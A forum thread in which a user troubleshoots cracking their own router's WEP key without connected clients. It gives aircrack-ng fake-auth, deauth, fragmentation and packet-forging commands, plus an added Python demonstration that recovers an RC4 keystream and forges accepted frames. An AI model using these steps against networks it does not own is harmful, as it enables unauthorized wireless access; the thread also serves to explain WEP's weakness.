WEP cracking no client
So I am trying to crack my own WEP key without any clients connected. I have my router up and set up. The problem is that I don't get any ARPs when I am listening for ARPs. How can I generate traffic? I have read all around the forum and I still don't get an answer whether this can be done. Some people say yes, others no, others that you need two laptops (which I have access to if needed). Anyways, these are the commands that I use. The card can inject traffic no problem.
- airodump-ng -w ivs -c 6 ath1
- aireplay-ng -1 30 -e essid -b bssid -h myfakemac ath1 (fake auth because no clients)
- aireplay-ng -3 -e essid -b bssid -h myfakemac ath1 (listening for arps)
Until this point everything is OK. I know that fakeauth does not generate traffic.
Some people seem to think that the following step is to perform the deauth attack to generate traffic, however this doesn't seem to work. At least not for me. So this is what I do next.
- aireplay-ng -0 15 -b bssid -c myfakemac ath1 (when I do this attack I start getting deauth packets of course, but no traffic or arp is generated)
And I wait and wait and wait and wait!!! Airodump seems to grab data packets, but aireplay doesn't get any ARPs. Any comments? Am I doing something wrong? Thanks for the reply everybody.
Another thing you may want to try is a Fragmented attack via aireplay. It's a new feature added to aircrack-ng 0.7 suite. Very nice feature I may add. This will create a xor file that can be used with packetforge.
Try something like this after using FakeAuth of course:
aireplay-ng -5 -b <APMAC> -h <YOURMAC> <iface>
This will create the xor file for next step.
packetforge-ng -0 -a <APMAC> -h <YOURMAC> -k 255.255.255.255 -l 255.255.255.255 -y <file.xor> -w arp-request
This creates an ARP request to be used with aireplay:
aireplay-ng -2 -r arp-request <iface>
Works like a charm for me. Actually I think it actually works faster than having to wait for an ARP packet. Hope this helps!
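An added example, not part of the original posts: why the xor (keystream) file mentioned above is enough to build a frame the AP accepts, which is the design flaw that makes WEP unsuitable for protecting a network. It simplifies by taking the keystream from a known-plaintext frame rather than reproducing the fragmentation step, and all names and values are constructed.

```python
import struct
import zlib

def rc4(key, n):
    s, j, out = list(range(256)), 0, bytearray()
    for i in range(256):                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    for _ in range(n):                        # keystream bytes
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data):  # WEP integrity check value: CRC-32, little-endian
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_encrypt(iv, key, data):
    body = data + icv(data)
    return xor(body, rc4(iv + key, len(body)))   # per-frame seed is IV || key

def wep_decrypt(iv, key, ct):
    """Receiver side: return the data, or None if the ICV does not verify."""
    body = xor(ct, rc4(iv + key, len(ct)))
    return body[:-4] if body[-4:] == icv(body[:-4]) else None

def recover_keystream(ct, known_data):
    """Keystream for one IV = ciphertext XOR (known plaintext || ICV)."""
    return xor(ct, known_data + icv(known_data))

def forge(keystream, data):
    """Encrypt new data under the same IV using only the keystream."""
    body = data + icv(data)
    if len(body) > len(keystream):
        raise ValueError("keystream too short for this frame")
    return xor(body, keystream)

# Constructed sample values, not taken from the thread.
KEY, IV = bytes.fromhex("0badc0de42"), bytes.fromhex("00002a")
KNOWN, NEW = b"known-plaintext frame body, 36 bytes", b"forged payload, same IV"

def demo():
    ks = recover_keystream(wep_encrypt(IV, KEY, KNOWN), KNOWN)  # KEY not needed
    return wep_decrypt(IV, KEY, forge(ks, NEW))  # receiver accepts: returns NEW
```

The ICV is an unkeyed CRC, so anyone holding the keystream for one IV can compute a valid one; WPA2/WPA3 replace it with a keyed integrity check.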
Thanks for your reply. I had gone to the aircrack-ng webpage and their updated documentation. They had the fragmentation attack, which worked really well.
Well, that's better than my problem. I create TONS of fast traffic, but it all doesn't mean anything, it's all garbage. I run aircrack and see what key it's attempting, and it's nowhere near my key. I can't break my router's key if I set it to be 64(40) bit but 128(104) no way, even with 1.5 million IVs.